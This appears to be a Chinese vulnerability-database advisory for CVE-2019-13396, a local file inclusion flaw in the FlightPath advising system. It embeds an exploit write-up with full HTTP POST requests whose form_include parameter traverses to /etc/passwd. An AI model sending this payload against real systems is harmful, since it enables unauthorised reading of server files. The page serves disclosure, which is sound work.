FlightPath 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1662839 漏洞类型 路径遍历
发布时间 2019-07-15 更新时间 2019-07-18
CVE编号 CVE-2019-13396 CNNVD-ID CNNVD-201907-565
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019070067
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201907-565
|漏洞详情
FlightPath是一套面向大学的开源学术咨询系统。 FlightPath 4.x版本和5.0-x版本中存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。
|漏洞EXP
# Exploit Title: FlightPath < 4.8.2 & < 5.0-rc2 - Local File Inclusion
# Date: 07-07-2019
# Exploit Author: Mohammed Althibyani
# Vendor Homepage: http://getflightpath.com
# Software Link: http://getflightpath.com/project/9/releases
# Version: < 4.8.2 & < 5.0-rc2
# Tested on: Kali Linux
# CVE : CVE-2019-13396


# Parameters : include_form
# POST Method:

use the login form to get right form_token [ you can use wrong user/pass ]

This is how to POST looks like:

POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1

callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_type=&form_path=login&form_params=YTowOnt9&form_include=&default_redirect_path=login&default_redirect_query=current_student_id%3D%26advising_student_id%3D&current_student_id=&user=test&password=test&btn_submit=Login


# modfiy the POST request to be:


POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1

callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_include=../../../../../../../../../etc/passwd




# Greats To : Ryan Saaty, Mohammed Al-Howsa & Haboob Team.
|参考资料

来源:getflightpath.com

链接:http://getflightpath.com/node/2650


来源:nvd.nist.gov

链接:https://nvd.nist.gov/vuln/detail/CVE-2019-13396